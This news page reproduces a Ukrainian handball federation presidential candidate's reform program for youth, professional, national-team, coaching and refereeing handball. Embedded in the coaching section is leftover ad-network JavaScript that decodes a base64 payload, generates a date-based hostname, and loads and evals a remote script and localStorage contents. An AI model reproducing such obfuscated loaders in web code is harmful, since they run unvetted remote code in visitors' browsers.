ПРОГРАМА кандидата на посаду Президента Федерації гандболу України Геннадія Касая «Дороговказ майбутнього українського гандболу»
«Український гандбол має великі традиції. Ними варто пишатись і ніколи про них не забувати». Саме з таких слів починається розповідь про розвиток українського гандболу на офіційному сайті Федерації гандболу України. Втім, за останні роки нам й залишається тільки пишатися минулими досягненнями, бо сьогодення сучасного українського гандболу нажаль сумне. Більшість гравців виїхало та продовжують виїжджати за кордон в пошуках кращої спортивної долі, а в національній першості грають переважно юні гандболісти. Кількість команд в офіційних лігах постійно скорочується. Успіхи на міжнародній арені тануть з кожним роком. Тепер за вагомий здобуток вважається участь збірних команд у фінальних турнірах чемпіонатів Європи та Світу. Виросло ціле покоління українських гандболістів, яке позбавлене відчуття гордості за український гандбол!
За останні десять років керівництво нашої Федерації зробило все, задля того що б український гандбол не розвивався. Сьогодні ми чесно повинні визнати – або ми починаємо кардинальне реформування українського гандболу, або наступні покоління спортсменів будуть згадувати про український гандбол вивчаючи історію видів спорту, які перестали існувати в нашій державі!
Я взяв на себе сміливість говорити про занепад українського гандболу на сучасному етапі розвитку нашої країни, бо являюсь представником славетної «запорізької» школи та сім’ї гандболу. Наша запорізька земля пишається своїми чемпіонами-гандболістами: Юрієм Рєзніковим, Валентином Цапенко, Леонідом Ратнером, Сергієм Кушнірюком, Вячеславом Дідушенко, Олександром Рєзановим, Михайлом Іщенко, Юрієм Лагутіним, Олександром Шипенко, Миколою Томіним, Ганною Бурмістровою, Ларисою Заспою, Валентиною Лутаєвою, Галиною Маркушевською, Оксаною Райхель на багатьма іншими. Запорізькі чоловічі команди за роки Незалежності 23 рази вигравали чемпіонат країни (14 — ZTR та 9 – МОТОР). 14 разів вигравала регулярну першість найвищого рівня й жіноча команда «МОТОР». Саме в Запорізькій області функціонує три ДЮСШ з гандболу та ще три філії в містах обласного значення. Кількість учнів в них перевищує 1500 хлопців та дівчат. І це найвищій показник в Україні. Я та моя команда змогли не тільки підтримати розвиток гандболу в нашій області, а й маємо програму виходу вітчизняного гандболу з багаторічної кризи.Наша програма базується на семи основних напрямах: розвиток дитячо-юнацького гандболу, розвиток професійного гандболу, розвиток збірної країни з гандболу, розвиток аматорського та ветеранського гандболу, розвиток пляжного гандболу, робота обласних осередків ФГУ, суддівський корпус та робота тренерів.
Дитячо-юнацький спорт – основа та каталізатор розвитку вітчизняного гандболу
Кожен вид спорту починається з зацікавленості. Насамперед з зацікавленості дітей та молоді. Ми пам’ятаємо часи, коли гандбол був невід’ємною складовою ігрових видів спорту нашої держави. Гандбол швидко розвивався поруч з футболом, баскетболом та волейболом. І не дивно, що саме футбол та гандбол довгі роки були гордістю та окрасою вітчизняного спорту. Втім за останні роки ми втратили свої позиції. Ми перестали бути цікавими дітям та молоді. З їх вуст перестали звучати прізвища відомих улюблених титулованих гандболістів. Нашу нішу потрохи зайняли баскетбол та волейбол. Прийшов час повернути увагу дітей та молоді до гандболу. Або ми це зробимо зараз, або завтра гандбол будуть згадувати в Україні на рівні лапти, городків чи авіамоделювання. Часу замало а роботи багато. З чого треба почати?
Проведення аудиту гандбольної інфраструктури та контингенту дітей, які займаються гандболом в Україні.
Підтримка діючих ДЮСШ та відкриття нових шкіл та відділень в регіонах, де гандбол розвинуто не на достатньому рівні.
Відкриття нових та модернізація існуючих спортивних інтернатів у «гандбольних» регіонах країни за рахунок місцевих бюджетів та підприємств-донорів.
Повернення всеукраїнського формату змаганням «Стрімкий м’яч».
Введення обов’язкового електронного паспорту гандболіста. Це дозволить не тільки в режимі онлайн стежити за розвитком молодих гандболістів, а й вдосконалити існуючу систему подачі заявок для участі в чемпіонатах України.
Проведення щоквартальних зборів представників ДЮСШ на базі ФГУ для обговорення сучасного стану та перспектив розвитку гандболу в Україні та регіонах.
Розробка спільно з Міністерством освіти та науки оптимального календаря та системи проведення чемпіонатів з гандболу в різних вікових групах.
Повернення «гандболу» до обов’язкових у переліку ігрових видів спорту у шкільній програмі з фізичної культури.
Популяризація гандболу в школах та коледжах. Перш за все, за рахунок надання підготовлених тренерів (або підготовки/перепідготовки працюючих вчителів з фізичної культури) та формування за рахунок місцевих бюджетів та ФГУ матеріально-технічної бази (м’ячі, ворота, форма тощо).
Створення Шкільної ліги з гандболу.
Відкриття в Запоріжжі Центру олімпійської підготовки з гандболу.
Залучення дитячих тренерів до міжнародних заходів з метою підвищення професійного рівня та розвитку власного соціального капіталу.
Проведення в Україні міжнародних турнірів серед команд різних вікових груп.
Популяризація гандболу серед студентів. Створення команд в університетах. Створення в подальшому Студентської гандбольної ліги.
Обов’язкове проведення Всеукраїнської студентської універсіади з гандболу. Створення на базі студентських команд збірної України для участі в Європейській універсіаді з гандболу.
Професійний гандбол – міцний фундамент національних збірних різних рівнів
Професійний гандбол – це лакмусовий папірець розвитку гандболу в Україні в останні роки. Падає інтерес до гандболу, падає й інтерес та рівень підтримки професійного гандболу. З початком війни ця динаміка ще більше погіршилася. Окрім загально зниження рівня професійних команд, за останні роки ми спостерігаємо й за відтоком якісних гравців за кордон. Ми повинні створити усі умови для розвитку професійного гандболу та повернення талановитих гравців до України. Для цього необхідно зробити наступні кроки:
Створення професійної гандбольної ліги (ПГЛ). Така Ліга повинна мати своє керівництво та незалежних спонсорів.
Для популяризації та висвітлення ігор ПГЛ необхідно створити єдиний телевізійний пул. На першому етапі співпраці з телевізійними каналами, слід підключати трансляції матчів через інтернет та місцеві телевізійні канали.
Розширення кількості учасників ПГЛ за перші два повоєнні роки до 12 команд в чоловічій Суперлізі та десяти команд в жіночій Суперлізі.
Створення єдиної бази даних (реєстру) професійних гравців.
Введення єдиної системи договорів між професійними клубами та гравцями з обов’язковим контролем зі сторони ФГУ. До кінця 2025 року ми повинні вийти на 100% контрактів.
Створення єдиного календаря змагань різного рівня. Цей календар є обов’язковим для регіональних відділень ФГУ. Останні можуть вносити доповнення місцевого рівня без внесення змін.
Залучення професійних клубів до різноманітних соціальних проєктів з метою популяризації гандболу в Україні.
Відродження кубку України серед жіночих команд.
Створення аналітичної служби ФГУ. Основна мета діяльності Служби — ведення обов’язкової системи статистичних показників щодо якісних та кількісних показників матчів чемпіонатів України на всіх рівнях.
Визначення найкращих гравців за результатами матчів та найкращого тренера за результатами тура. Нагородження переможців.
Організаційна та фінансова підтримка професійних клубів, які відстоюють честь України на міжнародній арені.
Збірні команди України. Повернення забутого смаку перемог
Багато років підряд збірні команди України завдавали тон на міжнародній арені. Нажаль, за останні роки ми втратили смак перемог! Прийшов час переглянути наше ставлення до збірних та їх підготовки. Ми повинні оцінити існуючи недоліки та прийняти необхідні управлінські рішення. Моя команда знає що треба зробити щоб присмак невдач змінився на смак Перемог.
Створення Тренерських рад. Окремо чоловічого та жіночого відділення. У склад Рад повинні входити 5-7 членів (провідні тренери з великим стажем роботи та значними досягненнями на міжнародній арені, прославлені гандболісти, науковці, що працюють в галузі гандболу тощо). До основних цілей діяльності Рад відносяться: моніторинг виступів збірних різних рівнів, участь в обговоренні кандидатур на посади головних тренерів збірних, призначення радників головних тренерів (переважно зі свого складу), представлення ФГУ у міжнародних заходах (ЧС, ЧЄ, міжнародні турніри тощо).
Моніторинг роботи тренерських штабів збірних України з гандболу різного віку. Обов’язкове звітування тренерів національних збірних після відбіркових турнірів та фінальних стадій турнірів.
Створення та ведення єдиного календаря зборів збірних країни з обов’язковими контрольними іграми.
Збільшення кількості та якості зборів збірних команд за рахунок ФГУ та державного бюджету.
Збільшення кількості ігор збірних за рахунок товариських матчів та матчів в рамках міжнародних турнірів.
Введення обов’язкових щомісячних стипендій до гравців збірних.
Обов’язкове медичне страхування всіх гравців національних збірних різного віку.
Разом з Міністерством освіти та науки України, розробити механізм пільгового навчання у вишах країни для гравців збірних, які досягли значних успіхів на спортивній арені.
Організація телевізійних трансляцій ігор національних збірних різного віку на ЧС, ЧЄ та провідних міжнародних турнірах.
Залучення науковців та вузьких спеціалістів (психологів, спеціалістів з НЛП, фізіотерапевтів тощо) до підготовки національних збірних різного віку. Для цього планується підписання договорів про співробітництво з Національною Академією Наук та Національним університетом фізичного виховання і спорту України.
Якісний тренерський корпус – запорука великих перемог
Кожному спортсмену відомо, що тренер – це не тільки фахівець у своїй галузі. Це й менеджер, й психолог, й організатор, й товариш, й суворий керівник, й другий батько. Від тренера залежить майбутнє спортсмена! І це не просто красиві слова. Це реалії життя кожного спортсмена. Нажаль, нагальною проблемою розвитку гандболу в Україні на сучасному етапі є відсутність достатньої кількості кваліфікованих тренерів на всіх рівнях. Це спричинено багатьма факторами. Основними з них є: відсутність системи підготовки/перепідготовки тренерів, відсутність системи стимулювання роботи тренерів, виїзд багатьох тренерів за кордон тощо. Вирішення цих проблем дозволить нам не тільки залучити професійних тренерів до розвитку гандболу в Україні, а й створити підґрунтя на багато років вперед. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Що ми плануємо зробити аби подолати вказані проблеми.
Створення реєстру тренерів. Це дасть можливість місцевим осередкам ФГУ та клубам залучати тренерів з різних куточків країни.
Створення реєстру вітчизняних тренерів, які працюють за кордоном.
Введення обов’язкового ліцензування тренерів. Для цього створюються курси тренерів при ФГУ та регіональних осередках ФГУ. Для різних рівнів різні типи ліцензій.
Організація підвищення кваліфікації тренерів вищої категорії в провідних країнах Європи та Світу за рахунок ФГУ.
Введення в дію програми стимулювання тренерів. Ключовими критеріями фінансового стимулювання тренерів є: рівень роботи, кількість проведених матчів на офіційному рівні, кількість виграних матчів, кількість отриманих звань «тренер туру» тощо.
Організація та проведення семінарів для тренерів з залучення провідних міжнародних спеціалістів та науковців.
Фінансове стимулювання дитячих тренерів за підготовку молодих гандболістів.
Розвиток інституту суддівства в українському гандболі
З загальним падінням розвитку гандболу в Україні закономірно впав і рівень суддівства. Ми дійшли за останні роки до того, що сильно скоротилася кількість суддівських пар європейського рівня в Україні. Зараз їх аж 2!!! Порівняння з іншим країнами вражає ще більше. Македонія – 8, Польща – 7, Боснія та Герцеговина – 7, Кіпр – 5!!! Всіх зрозуміло, що треба кардинально змінити відношення до підготовки/перепідготовки суддів. Пропоную:
Створення реєстру суддів. Це дозволить спочатку зробити аудит суддівського корпусу в Україні, а потім виокремити регіони та рівні змагань, де відсутня достатня кількість підготовлених суддів.
Проведення два рази на рік семінарів для суддів та делегатів всіх рівнів. Окремо планується проведення семінарів для молодих суддів. Участь суддів на таких семінарах обов’язкова.
Лобіювання участі молодих суддів на дитячих міжнародних турнірах задля отримання професійного досвіду.
Організація рекрутінгу досвідчених гандболістів, які закінчили свою професійну кар’єру, до суддівського корпусу.
Стимулювання роботи суддів. Судді міжнародного рівня повинні підвищувати кваліфікацію за рахунок коштів ФГУ у провідних гандбольних державах Світу.
Підвищення заробітної плати суддів.
Створення прозорої системи оцінювання роботи суддів. Чітка кореляція між оцінкою роботи судді та кількістю матчів, що він обслуговує.
Запровадження рейтингу суддів. Оновлення результатів кожний рік після закінчення сезону.
Аматорський та ветеранський гандбол: звитяги зацікавленості та тріумф досвіду
На відміну від професійного гандболу, ветеранські та аматорські змагання проводяться дуже часто й мають велику увагу серед поціновувачів гандболу. І це не дивно, бо проведення таких змагань не вимагає великих фінансових витрат та має на меті підтримку фізичної форми учасників змагань. В тім, ми не можемо залишити розвиток аматорського та ветеранського гандболу неконтрольованим. Тим паче, що вони потребують нашої допомоги. А саме:
Допомога у організації та проведенні змагань на місцевому рівні.
Допомога у забезпеченні учасників змагань формою, м’ячами, якісними полями, суддівством, нагородами тощо.
Проведення круглих столів та семінарів з представниками аматорського та ветеранського гандболу щодо перспектив розвитку вітчизняного та світового гандболу.
Організація та проведення всеукраїнських чемпіонатів з аматорського та ветеранського гандболу за зональним принципом.
Забезпечення медійної підтримки змагань з аматорського та ветеранського гандболу.
Пляжний гандбол. Молодий але досвідчений
Пляжний гандбол – це один з найтитулованіших не олімпійських видів спорту в Україні! Тому ФГУ повинна приділяти значну увагу розвитку цього виду спорту й підтримувати його на теренах нашої країни.
На що треба звернути увагу?
Підтримку тісного зв’язку між ФГУ та Асоціацією пляжного гандболу України
Сприяння у питаннях розвитку спортивної інфраструктури для змагань з пляжного гандболу.
Відкриття груп пляжного гандболу в спортивних інтернатах, де гандбол є пріоритетним.
Допомога у забезпеченні інформаційної підтримки діяльності Асоціації пляжного гандболу України на інтернет-сайтах ФГУ та у телевізійних трансляціях всеукраїнських змагань з пляжного гандболу.
Сприяння у забезпеченні умов для якісної підготовки збірних команд України з пляжного гандболу перед важливими міжнародними змаганнями.
Взаємодія обласних осередків та ФГУ. Від прихованого товариства до відкритої співпраці
Одна з головних проблем розвитку українського гандболу в останні десять років – це відсутність інформації щодо роботи ФГУ та її осередків на місцях. При чому, інформацією про те, що робить ФГУ не володіють не тільки любителі гандболу, а й самі осередки. Так само і ФГУ не сильна володіє (а здебільшого й не хоче володіти) інформацією щодо роботи своїх осередків. Ми повинні переглянути відносини між ФГУ та її осередками. І для цього є всі інструменти.
Необхідно вести інформаційну політику нашої Федерації у відповідності з вимогами сучасного інформаційного простору (швидкісна робота сайту, проведення брифінгів, проведення соціальних проєктів та заходів, співпраця з іншими федераціями з ігрових видів спорту, створення ТГ-каналів, створення сторінок Федерації в Instagram, Facebook тощо).
Проведення аналізу роботи обласних осередків ФГУ з обов’язковим обговоренням на профільних нарадах.
Заслуховування звітів обласних осередків ФГУ за графіком під час проведення щоквартальних зборів керівників.
Організація проведення розсилки на офіційні сайти обласних осередків ФГУ адаптованих матеріалів ЄГФ та ІГФ з коментарями провідних фахівців в галузі гандболу (вітчизняних та міжнародних).
Проведення виїзних нарад та статутних заходів з долученням до них представників місцевої влади та бізнес еліт. Це дозволить нам налагодити більш тісний зв’язок з місцевими органами влади та органами місцевого самоврядування й знайти нових спонсорів для розвитку гандболу в регіонах.
Проведення щорічного рейтингу осередків ФГУ з подальшим нагородження переможців.
Забезпечення участі керівників обласних осередків ФГУ на офіційних змаганнях збірних команд України з гандболу за рахунок ФГУ.
Лобіювання українських спеціалістів на керівні посади в комісіях та інших структурах ЄГФ та ІГФ.
Лобіювання проведення фінальних частин ЧС та ЧЄ, починаючи з юніорів.
Поліпшення іміджу Федерації гандболу України на міжнародній арені за рахунок більш активної участі в житті світової гандбольної спільноти.
Підписуйтесь на Акцент в
(adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/kandidat-na-posadu-prezidenta-fgu-gennadij-kasaj-opublikuvav-programu-rozvitku-gandbolu/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook